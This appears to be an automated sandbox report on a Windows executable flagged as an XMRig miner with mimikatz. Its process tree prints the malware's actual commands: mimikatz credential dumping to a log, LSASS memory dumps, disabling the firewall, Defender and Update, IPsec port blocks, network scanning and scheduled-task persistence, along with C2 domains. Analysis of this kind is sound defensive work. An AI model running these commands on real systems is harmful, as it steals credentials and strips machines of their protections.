Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
15/10/2024, 02:14 UTC
General
-
Target
bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe
-
Size
7.6MB
-
MD5
9b1817a2ee30bbbce35c481b8afa4960
-
SHA1
fec68058190c48b15e3edc07ab9a888387913e1d
-
SHA256
bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636
-
SHA512
32dcf046626cc9b211a69eec6eaa672173d6ce723a53be23631796c747a4279c569a73d4019a74fedb9d9cb3428f911b06fb2b6556f7a30e0d8f2ddd4dbb9e6d
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 6 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 8 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 17 IoCs
-
Loads dropped DLL 24 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 8 IoCs
-
UPX packed file 28 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 57 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 31 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\tckjwhyci\aktvci.exe"C:\Windows\TEMP\tckjwhyci\aktvci.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe"C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rtldfmcc\nihkvnz.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\rtldfmcc\nihkvnz.exeC:\Windows\rtldfmcc\nihkvnz.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\rtldfmcc\nihkvnz.exeC:\Windows\rtldfmcc\nihkvnz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exeC:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exeC:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ypbgnfgfn\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\ypbgnfgfn\Corporate\vfshost.exeC:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 768 C:\Windows\TEMP\ypbgnfgfn\768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1124 C:\Windows\TEMP\ypbgnfgfn\1124.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1180 C:\Windows\TEMP\ypbgnfgfn\1180.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1312 C:\Windows\TEMP\ypbgnfgfn\1312.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1560 C:\Windows\TEMP\ypbgnfgfn\1560.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1584 C:\Windows\TEMP\ypbgnfgfn\1584.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2680 C:\Windows\TEMP\ypbgnfgfn\2680.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exeC:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2692 C:\Windows\TEMP\ypbgnfgfn\2692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\huzbiq.exeC:\Windows\SysWOW64\huzbiq.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskeng.exetaskeng.exe {7992D409-5805-4FE5-9E67-78F88167473F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\nihkvnz.exe2⤵
-
C:\Windows\ime\nihkvnz.exeC:\Windows\ime\nihkvnz.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F3⤵
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F3⤵
-
-
Network
-
DNSuio.hognoob.seRemote address:8.8.8.8:53Requestuio.hognoob.seIN AResponse -
DNSuio.heroherohero.infoRemote address:8.8.8.8:53Requestuio.heroherohero.infoIN AResponseuio.heroherohero.infoIN A43.240.239.76
-
DNSyxw.hognoob.seRemote address:8.8.8.8:53Requestyxw.hognoob.seIN AResponse
-
DNS2019.ip138.comRemote address:8.8.8.8:53Request2019.ip138.comIN AResponse2019.ip138.comIN CNAMEwaf.ip138.comwaf.ip138.comIN A110.81.155.138waf.ip138.comIN A59.57.14.11waf.ip138.comIN A59.57.13.133waf.ip138.comIN A110.81.155.137waf.ip138.comIN A59.57.13.182
-
DNSpxi.hognoob.seRemote address:8.8.8.8:53Requestpxi.hognoob.seIN AResponse
-
DNShaq.hognoob.seRemote address:8.8.8.8:53Requesthaq.hognoob.seIN AResponse
-
DNSpxx.hognoob.seRemote address:8.8.8.8:53Requestpxx.hognoob.seIN AResponse
-
43.240.239.76:63145uio.heroherohero.info -
110.81.155.138:802019.ip138.com -
59.57.14.11:802019.ip138.com
-
59.57.13.133:802019.ip138.com
-
8.8.8.8:53uio.hognoob.sedns
DNS Request
uio.hognoob.se
-
8.8.8.8:53uio.heroherohero.infodns
DNS Request
uio.heroherohero.info
DNS Response
43.240.239.76
-
8.8.8.8:53yxw.hognoob.sedns
DNS Request
yxw.hognoob.se
-
8.8.8.8:532019.ip138.comdns
DNS Request
2019.ip138.com
DNS Response
110.81.155.13859.57.14.1159.57.13.133110.81.155.13759.57.13.182
-
8.8.8.8:53pxi.hognoob.sedns
DNS Request
pxi.hognoob.se
-
8.8.8.8:53haq.hognoob.sedns
DNS Request
haq.hognoob.se
-
8.8.8.8:53pxx.hognoob.sedns
DNS Request
pxx.hognoob.se
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
1.3MB
MD593552c6c837a49b271e74ade66458721
SHA13424e1c6b4527dd45d19bbc1e42aa9c469dd3b14
SHA2565d75b89665165019e5b62aa1cc94763dcacb146d26bd0fc8aaf7d4f37000a2a0
SHA51279600267e0bd5f6b7ca5f27aa2a2971bd2f02db058d494a562038feae4defc3a4a64ab6a48055ca37f52a5671faaa309ad2956998a46e1f78a771a6c16868319
-
Filesize
1.3MB
MD547829f26c17a18e1c21490e1df2be364
SHA1f3e7279f5272fcba4ac2561633d321f0dc2604a5
SHA256ba955dc369da9673e5c753e383a18b10036ad18516146d2ca5fa204fc13afe3f
SHA51291794cccb9270f2372a43aa1b824ea438547a4838c888127ff2dac69e9bd6b10cdf9de0bfe83342bef95530cadbf25e83804ae628a3b204340317c3139423abf
-
Filesize
4.5MB
MD536ed47223ed8a9634b0ac7359433fa00
SHA130614d6ce8b1de7f589b2eb5f62c275c161b4486
SHA25684a363dc0ca1fa066bcccd85e03260580b50e42d6edd2c9a0b55ce5dfdb4fd79
SHA512eed3786ce17a5a4c8f174b4f489327e51ec1ba1e622bf1db1a07a59119221a21fab266fb4306b884ddb67a14d1859e4a4236af8fbf25565bcd3cdac258407855
-
Filesize
2.2MB
MD5637a2bd1fa9c078d3e8dfbd2c3de305b
SHA1d165dfb09d5ad553c45b2c3f4d6ef26af3ff8d0c
SHA256754b39394d9ad94a2b89677b41fcfa1352ba195cf4c1bda6425a68986b8198a6
SHA51272a149137f23f38b343e6165c1a801a43ae8edbe97e275d528bdfb41abede87271866825f7f4d0bbc8df04a8351494c97c7f9dfb38d570fd3fe9319e626ac032
-
Filesize
5.3MB
MD58cb8357c13329513488ef4dc85367dfb
SHA15c112c4201839dd2f103f8356afe6b4b9af5e6bc
SHA256a9fdc86e7137658b860f00a11b02fe6e9fb7cec096f47f38a5e0e5e7d6ec7d75
SHA5122d9e7916bcc5c2f7d8f2a76191f287d3823ad8b741836c9cce151e5ea56bf01a1f3640f8cc07f9933f532a06136626a93e750d2900520b53478006e722d32720
-
Filesize
6.8MB
MD55386c24ed854e2b845bb0bf45cbd2d93
SHA125734ddfdcc2e1a74702707fa988eed6c14a5e0d
SHA2560f4cb0f0b99815b6dde94cd6227853ec7a45287542e5c4f1b356c7622c21906b
SHA512cf2ee2d67bee445810ae2f9833cb2ded9b212c6ab0b5610d8c2e992ca8e1a6b7bde3927ba9cb7beea1878b19084eebdb4c9c748c1cd809272555ed55882e6051
-
Filesize
843KB
MD5c4e2d4967b5070b751a18fb24372d648
SHA1016613da2e7bead2dc751d5898ea01fc68ffeca7
SHA25683829f5bdfc08f15294bb83f5eff23bb7830f1cdabf93ec551391066ffc9af1a
SHA5126c05b347a66e9f790dae60756ebf5df6ff417d03398e3de548856e22e926b442ca833eed0af8b29c5a325a15cdf03e6408a42bcc5f79da4b43a089b29e0965b2
-
Filesize
4.6MB
MD521075c9af7a85c30fe1183e4703405e2
SHA1c0556d8cca3c765a6a26351f63377d2ce38f7e29
SHA256d8d65c230716e0a39b0cb18ceaa25dea79d8dcc186bd87160c09743dedc2e956
SHA5122e8a4c25b2ecf4eba5acc51c550e986cf2cab68156cdf75af98d05f5eaa860806628c585bf508d0be25830d6cfb72abe72ef81d547c4b1396153302ee95217c1
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
975B
MD5b5d815ff5310f62de5020591be598bc0
SHA18013562b0cc2516d16d474308c8982a31b7f5dd0
SHA256a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85
